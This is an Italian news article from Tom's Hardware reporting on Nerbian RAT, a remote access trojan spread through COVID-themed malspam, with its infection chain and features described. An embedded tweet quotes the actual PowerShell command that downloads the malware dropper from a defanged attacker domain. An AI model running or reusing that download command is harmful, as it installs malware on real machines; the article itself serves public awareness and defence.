logo_toms
  • HOME
  • Tom’s hardware
  • Game Division
  • MobileLabs
  • Cultura Pop
  • MotorLabs
  • B2BLABS
  • More
  • forum
  • offerte
  • forum
hammer_toms
  • HOME
  • Tom’s hardware
  • Game Division
  • MobileLabs
  • Cultura Pop
  • MotorLabs
  • B2BLABS
  • More
  • forum
  • offerte
  • forum
  • Codici sconto
  • Recensioni
  • Recensione RTX 3090 Ti
  • Come installare Windows 11
  • Recensione RTX 3080 12GB
  • Le migliori VPN del 2022
Software

Un nuovo malware RAT sfrutta il COVID tramite campagne malspam

Codici sconto
Recensioni
Recensione RTX 3090 Ti
Come installare Windows 11
Recensione RTX 3080 12GB
Le migliori VPN del 2022

Tom's Hardware vive grazie al suo pubblico. Quando compri qualcosa dai nostri link, potremmo guadagnare una commissione. Scopri di più

Software

Un nuovo malware RAT sfrutta il COVID tramite campagne malspam

di Marco Doria | venerdì 13 Maggio 2022 11:00
  • 2 min
  • vai ai commenti
Più informazioni su
  • Cybersicurezza
  • malspam
  • Malware
  • Nerbian RAT
  • RAT
  • Trojan
  • Software

È stato scoperto un nuovo Remote Access Trojan (RAT) che sfrutta l’argomento COVID-19 per diffondersi tramite campagne malspam. Il trojan è noto come Nerbian RAT ed è stato scoperto dai ricercatori di Proofpoint. Il malware sfrutta le immagini dell’Organizzazione Mondiale della Sanità (OMS) per ingannare le vittime, e presenta delle sconcertanti capacità di elusione delle analisi.

Programmato nel linguaggio Go e compilato per i sistemi a 64 bit, Nerbian è un grado di installarsi su varie piattaforme, mentre le campagne per la sua diffusione hanno riguardato diversi settori.

Any ideas? – #WHO – #COVID19 themed lure

powershell IWR -Uri https://www.fernandestechnical.]com/pub/media/gitlog -OutFile C:UsersAdminAppDataRoamingUpdateUAV.exehttps://t.co/cQf1KK6UEt pic.twitter.com/bAbXJRM0ti

— proxylife (@pr0xylife) April 28, 2022

Le e-mail inviate alle vittime contenevano un file di Word dannoso, a volte compresso in un archivio RAR: le macro contenute nel documento, una volta attivate, presentavano informazioni sulla sicurezza in caso di COVID-19, con misure da adottare l’auto-isolamento dei soggetti infetti. Il documento, però, esegue tramite file bat una PowerShell che a sua volta scarica un dropper Goland a 64 bit, denominato “UpdateUAV.exe“. Il file scarica il RAT Nerbian e presenta un codice “cannibalizzato” da alcuni progetti GitHub.

Le funzioni supportate da Nerbian RAT includono un keylogger e uno strumento di acquisizione dello schermo, nonché un sistema di gestione delle comunicazioni tramite SSL. L’utente proxylife su Twitter ha segnalato il malware, che prende il nome da Don Chisciotte presentando il percorso del file e le immagini connesse all’OMS. La campagna ha avuto un volume molto ridotto, secondo i ricercatori di Proofpoint, ed è partita il 26 aprile 2022 colpendo diversi soggetti dislocati in Italia, Spagna e Regno Unito.

Nei periodi di estrema incertezza, come quelle che stiamo vivendo adesso, tra il proseguire della pandemia e il conflitto russo-ucraino, aumentano i tentativi di diffusione di malspam e altri malware come il ransomware, per questo motivo, consigliamo sempre ai nostri lettori di prestare particolare attenzione alle mail e ai messaggi sospetti, di tenere aggiornati i propri antivirus e assicurarsi di utilizzare password uniche e complesse, magari con l’aiuto di un password manager.

di Marco Doria |
venerdì 13 Maggio 2022 11:00
  • 2 min
  • vai ai commenti
Shares
Più informazioni su
  • Cybersicurezza
  • malspam
  • Malware
  • Nerbian RAT
  • RAT
  • Trojan
  • Software

Scarica gratis

l'app di Tom's Hardware
Vuoi ricevere aggiornamenti sui tuoi topics preferiti ogni giorno? Iscriviti alla newsletter
Leggi i commenti
toms_logo_white_footer
  • Privacy
  • Chi siamo
  • Contattaci
  • Feed RSS
  • Codici sconto
Google Play
App Store

3LABS S.R.L. • Via Dante 16 - Milano (MI) 20121
CF/P.IVA: 04146420965 - REA: MI - 1729249 - Capitale Sociale: 10.000 euro

Testata giornalistica associata all'USPI Unione Stampa Periodica Italiana, registrata presso il Tribunale di Milano, nr. 285 del 9/9/2013 - Direttore: Andrea Ferrario

Copyright © 2022 - 3Labs Srl. - Tutti i diritti riservati. - credits: logo_edinet


  • Tom's Hardware
  • Game division
  • MobileLabs
  • Cultura Pop
  • MotorLabs
  • B2BLabs
  • More
  • Home
  • Le news di oggi
  • Le news di ieri
  • Le news dell'altro ieri

Ultime news

Ultimo video

Da non perdere su Tom's Hardware
Scarpe Amazon
Sconti fino al 59% sulle scarpe delle migliori marche per lui e per lei!
Su Amazon sono partiti sconti pazzeschi fino al 59% su una serie di scarpe delle migliori marche, tra cui Adidas,…
2 di Dario De Vita - 13 ore fa
  • Offerte Abbigliamento
  • Offerte Amazon
  • Offerte e Sconti
  • Offerte Scarpe
  • scarpe
  • scarpe da ginnastica
  • scarpe da running
  • sneakers
2
Offerta
elettrodomestici_generico
Risparmi fino al 36% su tanti elettrodomestici per una cucina più salutare!
Siete alla ricerca di ottimi elettrodomestici da cucina a dei prezzi stracciati? Non lasciatevi scappare le promozioni presenti su Amazon.
2 di Valentina Valzania - 14 ore fa
  • elettrodomestici
  • Offerte Amazon
  • Offerte Cucina
  • Offerte e Sconti
  • Offerte Elettrodomestici
  • Piccoli elettrodomestici
2
Offerta